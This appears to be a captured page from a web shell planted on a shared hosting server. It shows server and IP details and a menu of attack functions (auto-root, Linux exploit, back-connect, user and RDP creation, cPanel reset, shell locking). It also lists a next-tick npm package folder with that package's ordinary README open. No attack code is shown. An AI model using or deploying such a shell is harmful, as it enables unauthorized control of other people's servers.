Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
next-tick /
[ HOME SHELL ]
Name
Size
Permission
Action
test
[ DIR ]
dr-xr-xr-x
.lint
180
B
-rw-r--r--
.npmignore
51
B
-rw-r--r--
.travis.yml
310
B
-rw-r--r--
CHANGES
901
B
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
README.md
769
B
-rw-r--r--
index.js
1.86
KB
-rw-r--r--
package.json
797
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# next-tick ## Environment agnostic nextTick polyfill To be used in environment agnostic modules that need nextTick functionality. - When run in Node.js `process.nextTick` is used - In modern browsers microtask resolution is guaranteed by `MutationObserver` - In other engines `setImmediate` or `setTimeout(fn, 0)` is used as fallback. - If none of the above is supported module resolves to `null` ## Installation ### NPM In your project path: $ npm install next-tick #### Browser You can easily bundle `next-tick` for browser with any CJS bundler, e.g. [modules-webmake](https://github.com/medikoo/modules-webmake) ## Tests [](https://travis-ci.org/medikoo/next-tick) $ npm test
Close